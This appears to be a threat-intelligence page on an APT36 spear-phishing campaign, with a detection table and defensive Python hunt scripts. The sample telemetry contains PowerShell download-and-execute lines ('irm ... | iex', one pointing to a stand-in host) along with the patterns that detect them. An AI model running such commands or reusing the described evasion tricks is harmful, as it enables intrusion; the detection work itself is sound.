
APT36 (Transparent Tribe) Sheet Attack Campaign
Indicators of Compromise
Summary of Actor: APT36, also tracked as Transparent Tribe, is a Pakistan-aligned cyber-espionage group that has targeted Indian government, defence and diplomatic entities for roughly a decade. Operation C-Major was an early (2016) Transparent Tribe campaign against Indian military personnel, delivered by spear-phishing with malicious attachments. The campaign covered on this page follows the same pattern: spear-phishing with RTF or LNK lures, staged ZIP delivery from actor-controlled .in domains, and implants (SHEETCREEP, FIREPOWER, MAILCREEP) that use legitimate cloud services for command and control.

General Features: The group deploys custom malware and evasion techniques, is persistent, and uses lures in the target's own language, themed as government communications, to build trust. In this campaign the implants poll Google Sheets, Firebase and Microsoft Graph rather than actor-owned servers, and part of the tooling is compiled in less common languages (Crystal, Nim, Zig) that are absent from standard software baselines.

Related Other Groups: SideCopy, which several vendors assess to overlap with Transparent Tribe in tooling and infrastructure.

Indicators of Attack (IoA):
- Suspicious email attachments (RTF files with OLE objects, LNK shortcuts) and links to ZIP delivery servers
- Unusual network traffic: non-browser processes polling Google Sheets, Firebase or Microsoft Graph at fixed intervals
- Use of compromised legitimate credentials (MAILCREEP authenticating to an Azure tenant with credential material read from disk)

Recent Activities and Trends:
Latest Campaigns: Phishing emails mimicking Indian government communications deliver RTF attachments carrying CVE-2026-21509 shellcode triggers or LNK files that launch PowerShell download-and-execute one-liners (irm [url] | iex), followed by a document stealer that uploads office files to a private GitHub repository.
Emerging Trends: A shift from actor-owned C2 infrastructure toward legitimate SaaS APIs (Google Sheets, Firebase, Microsoft Graph, GitHub) as C2 and exfiltration channels, payload hiding in image files (a byte-reversed PE stored as details.png and loaded reflectively with Assembly.Load), and malware written in niche compiled languages to evade signature-based baselines.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
Source: attack.mitre.org
| Technique Name | Detection ID | Detection Name | Recommended Detection Action |
|---|---|---|---|
| Phishing: Spearphishing Attachment | DET0115 | Spearphishing Attachment Detection | Alert on email delivery of RTF files with OLE objects or LNK shortcuts to Indian government domains; inspect RTFs for CVE-2026-21509 shellcode triggers. |
| Phishing: Spearphishing Link | DET0116 | Spearphishing Link Detection | Block links directing Indian Windows users to threat-actor-controlled ZIP delivery servers (hcidoc[.]in). These servers gate delivery with geofencing and User-Agent checks, so a sandbox fetch from outside India or with a non-Windows User-Agent may receive nothing. |
| User Execution: Malicious File | DET0294 | Malicious File Execution Detection | Alert on .LNK files opened from Downloads or Temp directories that spawn PowerShell with -e (Base64-encoded command) or an Invoke-RestMethod \| iex pipeline. |
| Command and Scripting Interpreter: PowerShell | DET0455 | PowerShell Behavioral Detection | Detect irm [url] \| iex patterns, PowerShell spawned by chrome.exe or edge.exe, and non-browser binaries polling Firebase or Google Sheets. |
| Native API | DET0459 | Non-Standard Scripting Language Execution | Flag execution of binaries compiled in niche languages (Crystal, Nim, Zig) that are absent from the standard software baseline on government endpoints. |
| Ingress Tool Transfer | DET0060 | Ingress Tool Transfer Detection | Monitor curl and PowerShell downloads of ZIP archives from actor-controlled domains; alert on hcidoc[.]in and similar typosquatted .in domains. |
| Modify Registry | DET0280 | Registry Modification Detection | Alert on scheduled task creation by PowerShell running from %USERPROFILE% that persists the LNK-launched FIREPOWER implant at user logon. |
| Deobfuscate/Decode Files or Information | DET0275 | Deobfuscation/Decode Detection | Detect Assembly.Load of byte-reversed PE buffers (the details.png payload is stored reversed and flipped back in memory) via ETW or AMSI telemetry from the .NET runtime. |
| Remote Access Tools | DET0496 | Remote Access Tool Detection | Flag remote access not deployed by IT: SHEETCREEP polling Google Sheets every 3 s, FIREPOWER polling Firebase every 120–300 s, MAILCREEP polling an Azure mailbox. |
| System Information Discovery | DET0190 | System Information Discovery Detection | Alert on PowerShell enumeration of C:\Program Files, %USERPROFILE%\Desktop and Downloads immediately after LNK execution. |
| File and Directory Discovery | DET0192 | File and Directory Discovery Detection | Detect scanning of .txt, .csv, .pdf, .docx, .xlsx, .pptx and .html files in Desktop, Documents and OneDrive by processes other than the user's own applications (document stealer). |
| Exfiltration Over Web Service: Exfiltration to Code Repository | DET0420 | Exfiltration to Code Repository Detection | Alert on git push or GitHub REST API calls to private repositories from workstations outside business hours (document-stealer upload). |
| Event Triggered Execution: Trap | DET0145 | Scheduled Task / Logon Script Detection | Detect GServices.vbs registered as a logon scheduled task that loads SHEETCREEP via PowerShell reflection at each user logon. |
| Unsecured Credentials: Credentials In Files | DET0200 | Credential in Files Detection | Alert on MAILCREEP reading credential material from the filesystem to authenticate to the Microsoft Graph API / Azure tenant. |
| Application Layer Protocol: Web Protocols | DET0425 | C2 over Web Protocols Detection | Detect HTTPS C2 to the Google Sheets API, Firebase Realtime Database and Microsoft Graph API from non-browser processes; baseline normal traffic to these services and alert on deviations. |
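The DET0294 and DET0455 rows describe one behavioural chain: a LNK opened from Downloads spawns PowerShell with an encoded command or an irm ... | iex pipeline, sometimes with a browser as parent. The following hunt logic is an added example written for this page, not detection content from MITRE or from any vendor report on the campaign. It runs over constructed process-creation events whose field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, CurrentDirectory); the events, the example.invalid URL and the SHEET_ID placeholder are assumptions for illustration.

```python
"""Hunt constructed Sysmon-style process events for the LNK -> PowerShell
download-and-execute chain (encoded command, irm|iex, browser parent)."""
import base64
import re
from typing import Dict, List, Optional

# "irm <url> | iex" and its long-form aliases, case-insensitive.
IRM_IEX = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(?:iex|invoke-expression)\b",
    re.IGNORECASE,
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is Base64 of UTF-16LE.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe"}
STAGING_DIRS = ("\\downloads", "\\temp", "\\appdata\\local\\temp")
CLOUD_C2 = ("sheets.googleapis.com", "docs.google.com/spreadsheets",
            "firebaseio.com", "graph.microsoft.com")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL:
        return []
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cwd = ev.get("CurrentDirectory", "").lower().rstrip("\\")
    cmd = ev["CommandLine"]
    reasons: List[str] = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    # Match patterns against the visible command line and the decoded payload.
    effective = cmd + "\n" + (decoded or "")
    if IRM_IEX.search(effective):
        reasons.append("download-and-execute (irm|iex)")
    # A double-clicked LNK runs with explorer.exe as parent and the LNK's folder as cwd.
    if any(cwd.endswith(d) for d in STAGING_DIRS):
        reasons.append("launched from staging dir")
    if parent in BROWSERS:
        reasons.append("spawned by browser")
    if any(h in effective.lower() for h in CLOUD_C2):
        reasons.append("contacts cloud C2 service")
    return reasons


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> reasons for every event that triggers."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = analyse_event(ev)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample telemetry (not real events). The encoded payload is built here so it decodes.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode("irm https://example.invalid/s | iex".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {   # benign: scheduled admin script
        "Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
        "CurrentDirectory": r"C:\Windows\System32",
    },
    {   # LNK double-clicked in Downloads: explorer spawns an encoded PowerShell command
        "Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f"powershell.exe -NoProfile -WindowStyle Hidden -e {_ENCODED}",
        "CurrentDirectory": r"C:\Users\analyst\Downloads",
    },
    {   # browser-spawned PowerShell pulling a script body from a Google Sheet
        "Image": _PS, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": 'powershell -c "Invoke-RestMethod https://sheets.googleapis.com/v4/spreadsheets/SHEET_ID/values/A1 | iex"',
        "CurrentDirectory": r"C:\Users\analyst",
    },
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(idx, why)
```

Decoding the encoded command before matching is the part most rules skip; a rule that only inspects the raw command line never sees the irm|iex string. The staging-directory check is deliberately narrow (Downloads and Temp) so that scripts run from administrative paths do not trigger.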
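The DET0496 and DET0425 rows both reduce to the same observable: a non-browser process contacting the Google Sheets API, Firebase or Microsoft Graph at a fixed cadence (3 s for SHEETCREEP, 120–300 s for FIREPOWER). The beacon detector below is an added example for this page, not code from MITRE or from the campaign reporting. It consumes constructed connection records of the form (process name, destination host, epoch seconds); the process names, the Firebase hostname and the thresholds (at least 5 connections, coefficient of variation of the inter-arrival gaps at most 0.25) are assumptions to be tuned against your own baseline.

```python
"""Flag fixed-interval polling of Google Sheets, Firebase and Microsoft Graph
by non-browser processes over constructed connection records."""
import statistics
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# DNS suffixes of the services the table names, labelled with the implant pattern.
CLOUD_C2_SUFFIXES = {
    "sheets.googleapis.com": "Google Sheets API (SHEETCREEP-style)",
    "firebaseio.com": "Firebase Realtime Database (FIREPOWER-style)",
    "graph.microsoft.com": "Microsoft Graph (MAILCREEP-style)",
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

Record = Tuple[str, str, int]   # (process_name, destination_host, epoch_seconds)


def classify_host(host: str) -> Optional[str]:
    """Return the service label for a host under one of the watched suffixes, else None."""
    host = host.lower().rstrip(".")
    for suffix, label in CLOUD_C2_SUFFIXES.items():
        if host == suffix or host.endswith("." + suffix):
            return label
    return None


def find_beacons(records: List[Record], min_events: int = 5, max_jitter: float = 0.25) -> List[Dict]:
    """Group connections per (process, host) and report the ones with a regular interval."""
    by_key: Dict[Tuple[str, str], List[int]] = defaultdict(list)
    for proc, host, ts in records:
        proc = proc.lower()
        if proc in BROWSERS or classify_host(host) is None:
            continue
        by_key[(proc, host.lower())].append(ts)

    findings = []
    for (proc, host), times in by_key.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean   # coefficient of variation; 0 = perfectly regular
        if jitter <= max_jitter:
            findings.append({
                "process": proc, "host": host, "service": classify_host(host),
                "interval_s": round(mean, 1), "jitter": round(jitter, 3), "count": len(times),
            })
    return sorted(findings, key=lambda f: (f["process"], f["host"]))


def _series(proc: str, host: str, start: int, gaps: List[int]) -> List[Record]:
    """Build a connection series from a start time and successive gaps."""
    out, t = [(proc, host, start)], start
    for g in gaps:
        t += g
        out.append((proc, host, t))
    return out


# Constructed sample records (not real telemetry); the Firebase hostname is made up.
SAMPLE_RECORDS: List[Record] = (
    _series("powershell.exe", "sheets.googleapis.com", 1_700_000_000, [3] * 8)            # 3 s poll
    + _series("updater.exe", "projectx-default-rtdb.firebaseio.com", 1_700_000_010,
              [120, 121, 118, 121, 120])                                                  # ~120 s poll
    + _series("chrome.exe", "sheets.googleapis.com", 1_700_000_000, [3] * 8)               # browser: ignored
    + _series("outlook.exe", "graph.microsoft.com", 1_700_000_000, [40, 860, 5, 1095])     # irregular: ignored
    + _series("powershell.exe", "graph.microsoft.com", 1_700_000_000, [60, 60])            # too few events
)

if __name__ == "__main__":
    for f in find_beacons(SAMPLE_RECORDS):
        print(f)
```

Legitimate clients such as Outlook also talk to Graph, which is why the rule keys on regularity rather than on the destination alone; real implants often add random sleep, so raise max_jitter and min_events together when tuning rather than loosening only one.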
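The DET0275 row mentions a payload stored as details.png with its bytes reversed, which defeats a naive scan for the MZ/PE header until the loader flips it back in memory. The file triage below is an added example written for this page, not tooling from the campaign reporting; it constructs a header-only PE stub in memory (no real executable is embedded) and shows how the same check applied to the reversed buffer recovers the signature.

```python
"""Triage a dropped file for a byte-reversed PE image (the details.png trick)."""
import struct

E_LFANEW_OFFSET = 0x3C           # DOS header field holding the offset of the PE signature
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def pe_signature_offset(blob: bytes):
    """Return e_lfanew when blob has a DOS 'MZ' header and 'PE\\0\\0' at that offset, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, E_LFANEW_OFFSET)[0]
    if e_lfanew + 4 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return e_lfanew


def triage(blob: bytes) -> str:
    """'pe' for a forward PE, 'reversed-pe' when the header appears only after reversing, else 'other'."""
    if pe_signature_offset(blob) is not None:
        return "pe"
    if pe_signature_offset(blob[::-1]) is not None:   # what the loader does before Assembly.Load
        return "reversed-pe"
    return "other"


def verdict(filename: str, blob: bytes) -> str:
    """Combine the content check with an extension/magic mismatch for image files."""
    kind = triage(blob)
    if filename.lower().endswith(".png") and not blob.startswith(PNG_MAGIC):
        return f"{kind} masquerading as PNG"
    return kind


def make_header_only_pe() -> bytes:
    """Constructed 0x80-byte buffer with a valid DOS header and PE signature; not a runnable binary."""
    buf = bytearray(0x80)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


# Constructed samples: what a dropper would write as details.png, and a PNG-looking decoy.
FAKE_DETAILS_PNG = make_header_only_pe()[::-1]
REAL_PNG_PREFIX = PNG_MAGIC + bytes(120)

if __name__ == "__main__":
    print(verdict("details.png", FAKE_DETAILS_PNG))
    print(verdict("logo.png", REAL_PNG_PREFIX))
```

On disk the reversed file ends with "ZM" rather than starting with "MZ", so a YARA rule anchored at offset 0 misses it; checking the tail of the file (or, as here, the reversed buffer) is the cheap static complement to the runtime Assembly.Load telemetry the table recommends.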